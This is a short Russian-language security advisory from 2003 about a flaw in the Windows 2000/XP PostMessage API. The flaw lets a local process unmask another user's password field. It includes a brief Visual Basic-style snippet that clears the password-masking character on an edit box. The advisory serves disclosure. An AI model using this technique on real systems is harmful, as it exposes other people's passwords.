Security Lab

Недостаток в Microsoft Windows 2000/XP PostMessage() API позволяет локальным пользователям получать пароли других пользователей

Дата публикации:17.03.2003
Всего просмотров:1496
Опасность:
Наличие исправления:
Количество уязвимостей:1
CVE ID: Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID: Нет данных
Наличие эксплоита: Нет данных
Уязвимые продукты:
Описание: Уязвимость обнаружена в Microsoft Windows user interface Messages и Message Queueing API. Локальный пользовательский процесс может собирать пароли пользователей.

Недостаток обнаруженный в функции PostMessage позволяет локальному пользователю посылать сообщение к любой очереди сообщений (Message Queueing), в т.ч. и к потоку другого процесса.

Локальный пользователь может вызвать функцию SendMessage с EM_SETPASSWORDCHAR сообщением к очереди сообщений. Сообщение функции EM_SETPASSWORDCHAR PostMessage может использоваться, чтобы получить содержание поля пароля.

Пример:

'SendMessage posts the message and activates the message 
'queue immediately 
'Postmessage waits for the app to service the message queue
hwnd is the target Edit box handle
'Get the password character from the Edit box
current_passchar = SendMessage(hwnd, EM_GETPASSWORDCHAR, 0, 0)
'Disable the Password Character
'Only Post Message will work for SETPASS in win2k
ret = PostMessage(hwnd, EM_SETPASSWORDCHAR, 0, 0)
Уязвимость обнаружена в Microsoft Windows 2000/XP
Ссылки: Win32: Postmessage API security flaw